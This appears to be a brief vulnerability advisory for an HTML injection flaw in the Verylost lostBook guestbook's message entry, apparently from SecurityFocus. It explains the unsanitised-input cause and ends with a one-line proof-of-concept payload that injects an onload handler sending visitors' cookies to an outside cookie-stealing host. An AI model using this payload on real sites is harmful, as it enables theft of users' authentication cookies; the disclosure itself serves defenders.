7 lines
No EOL
776 B
Text
7 lines
No EOL
776 B
Text
source: https://www.securityfocus.com/bid/10825/info
|
|
|
|
Reportedly Verylost lostBook is affected by an HTML injection vulnerability in its message entry functionality. This issue is due to a failure of the application to properly validate and sanitize user-supplied input before including it in dynamically generated web page content.
|
|
|
|
This may allow an attacker inject malicious HTML and script code into the application. An unsuspecting user viewing the post will have the attacker-supplied script code executed within their browser in the context of the vulnerable site. This issue may be leverage to steal cookie based authentication credentials. Other attacks are also possible.
|
|
|
|
example.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie |